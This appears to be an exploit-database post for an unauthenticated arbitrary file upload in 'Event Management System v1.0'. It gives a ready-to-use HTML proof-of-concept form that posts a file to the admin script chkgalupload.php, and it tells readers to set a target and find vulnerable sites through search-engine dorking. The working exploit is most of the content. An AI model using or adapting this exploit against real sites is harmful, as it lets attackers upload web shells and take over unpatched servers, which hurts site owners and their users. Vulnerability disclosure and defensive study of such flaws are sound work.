Share
## https://sploitus.com/exploit?id=PACKETSTORM:181917
=============================================================================================================================================  
| # Title : Event Management System v1.0 arbitrary File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202302/kashipara.com_event-mgt-sys-zip.zip |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code uploads a arbitrary file remotely .  
  
[+] Line 10 set you target .  
  
[+] save code as poc.html .  
  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>File Upload Form</title>  
</head>  
<body>  
  
<form name="form1" action="http://127.0.0.1/event_mgt_sys/admin/chkgalupload.php" method="POST" enctype="multipart/form-data">  
<label for="file">Choose file to upload:</label>  
<input type="file" name="file" id="file" required>  
<br><br>  
<input type="submit" name="submit" value="Upload">  
</form>  
  
</body>  
</html>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================